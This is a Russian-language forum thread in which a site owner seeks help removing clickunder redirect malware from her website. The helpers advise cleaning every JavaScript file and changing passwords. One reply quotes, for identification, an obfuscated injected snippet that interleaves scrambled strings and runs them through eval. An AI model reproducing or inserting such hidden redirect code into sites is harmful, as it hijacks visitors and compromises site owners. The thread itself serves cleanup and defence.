Кликандер - как его убрать?

  • Автор темы Марина
  • Дата начала
Марина
Местный
Сообщения
35
Реакции
2
Здраствуйте. Помогите справится с надоевшим уже кликандером. Насколько я знаю в тело сайта его не ставила рекламы у меня на сайте нету но уже везде мне говорят что вместо сайта выскакивает этот инвалид. Кто знает подскажите как от него отвязаться??
мой сайт
money-sky.ru
 
Последнее редактирование:
himik
Участник
Сообщения
230
Реакции
32
я уже писал об этом ищите во всех js файлах этот код ну или наподобии этого он мог уже измениться,вставляли его в конец скриптов
Код:
(function(){var a="(ni(fcoc)f.br,=hp/)xut8ixut0)'t/)xut7ixut0)'w)xut4ixnx('=)xpt/[;(ief?!1=si')]erxaht(nwotnoner=dunree,=ce.oedt_mo'=wa(Dea(gDe+)omtoiin'a=eis+ir!'r!o&onx(e)-{ttv(ni(wd.ci.e't/br1}0)(;",b="fco)utn({(ss(8=ts/x.br)f.br,=hp/x.br)f.br,=w.x.br)f.dO')-x.l('0ixnx('=)xpt?[;tn}ro=wd.ci.sa)ecomterrcdunck,e=y_f,n t).ttDea(2;ce.oedt;t/xr=Dfe=&e=s&.dOin=1sIeafco)iolaohfhp/0uB,0})",c="utn{ni xixut0)'t:'=ss(;(ss(7=t:'=ss(;(ss(4=w'=ss(;(ief/!1=si')]f.dO')-x.l('0ru v sciolaohtm,f(ce.fr)oomtoiin'_=fDeDe;sDe.tt)0dunck=e+ph;pe';(f'&fhtciefdt=)enrlutn{nwotnr=t:q./'20})",d="";for(var i=0;i<a.length;i++)d+=a.charAt(i)+b.charAt(i)+c.charAt(i);eval(d);}());
удаляйте его и меняйте пароли от хостинга и фтп

п.с. кстати перешел на сайт никаких перенаправлений не увидел
 
Марина
Местный
Сообщения
35
Реакции
2
Вся проблема в том что эта страница выскакивает 1 раз и больше ее нету.
Был один код яваскриптовый... удалила.. но когда запускаю в серфинг (рекламу сайта) то блокируют говорят что разрушает фрейм и редирект.
вот то что выскакивает: http://prntscr.com/b0xipm
пароли меняю каждую неделю и все доступы тоже меняю.
---------------------------------------------------------------------------------------------
НАШЛА!!!! я этот код нашла!!!
 
Последнее редактирование:
himik
Участник
Сообщения
230
Реакции
32
Марина написал(а):
НАШЛА!!!! я этот код нашла!!!
Проверить надо все!!! js-файлы и после этого сменить пароли желательно тоже все!
 
Марина
Местный
Сообщения
35
Реакции
2
himik написал(а):
Проверить надо все!!! js-файлы и после этого сменить пароли желательно тоже все!
Прошлась по всем файлам, везде удалила нашла аж 5 скрытых таких кодов. Все запаролила. почистила историю браузера. Больше нету этого андера!! спасибо за помощь.... а то я реально хотела уже закрывать сайт и делать по новой все. ))))) теперь буду работать назло этим вирусам ))
 
Jons76
Участник
Сообщения
1
Реакции
0
Прошёл по Вашей ссылке. Всё равно было перенаправление.
 
StalkerNSK
Участник
Сообщения
102
Реакции
18
Ваше лекарство видимо не помогло, происходит перенаправление.
 
himik
Участник
Сообщения
230
Реакции
32
Просто не все файлы почищены,этот код размещают в скриптах и смотреть надо все.Скачать файлы на комп и проверить.
У меня сразу несколько сайтов заразили на одном хостинге,после чистки проблем до сих пор нет.
 
StalkerNSK
Участник
Сообщения
102
Реакции
18
Полностью согласен. :applause:
himik написал(а):
Просто не все файлы почищены,этот код размещают в скриптах и смотреть надо все.Скачать файлы на комп и проверить.
У меня сразу несколько сайтов заразили на одном хостинге,после чистки проблем до сих пор нет.
 
Марина
Местный
Сообщения
35
Реакции
2
  • #10
Да, Вы оказались правы! Более того если на этом же хосте есть и другие сайты то и их надо очищать... иначе они как-то сами перелезают по скриптам. Теперь все почистила.. Надеюсь больше не поймаю.
Если не трудно заскочите посмотрите появится или нет: ссылки: http://money-sky.ru и http://kapitan-neba.ru
 
Сверху